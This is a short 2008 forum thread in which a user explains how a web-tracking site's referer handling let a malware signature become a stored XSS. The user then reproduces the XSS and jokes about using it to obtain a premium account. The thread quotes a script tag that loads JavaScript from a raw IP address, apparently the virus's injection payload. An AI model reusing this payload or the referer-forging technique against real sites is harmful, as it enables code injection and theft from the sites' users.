Author | Post | |||
quangntenemy![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
I use this one to track visitors coming to my blog. Recently there has been an evil Chinese virus roaming around freely, and I have been blogging about it. And many people have been coming to my blog via the Google query: <script src=http://121.15.220.104/1.js></script> which is the signature for the virus. Guess what? Today when I visited eXTReMe Tracking, I saw this nice ad: ![]() What happened? No, neither my comp nor any other computer arround was pwned by the virus. It was the tracker site that got pwned. For some weird reason it htmldecoded the referer string, and as a result the malicious script was inserted to the page. Now let's see if I can "forge" the referer to insert my own script to the page ![]() |
|||
![]() |
|
|||
alt3rn4tiv3![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Haha. The ad writes "好消息", aka "good news" ![]() P.S. Forum is not asian-languages compatible. |
|||
Edited by alt3rn4tiv3 on 15.01.2008 14:15:20 | ||||
![]() |
|
|||
quangntenemy![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
I finally managed to reproduce the XSS in a "nice" way ![]() First you need to request the page: ![]() Then wait for a few minutes and you'll see the xss here: ![]() Screenshot: ![]() Now maybe I can use this to get a premium account. This type 2 XSS attack is surely the most dangerous one ![]() |
|||
Edited by quangntenemy on 18.01.2008 06:57:43 | ||||
![]() |
|
|||
unknown user |
jup that's pretty bad. |
|||
15.01.2008 15:41:10 |
|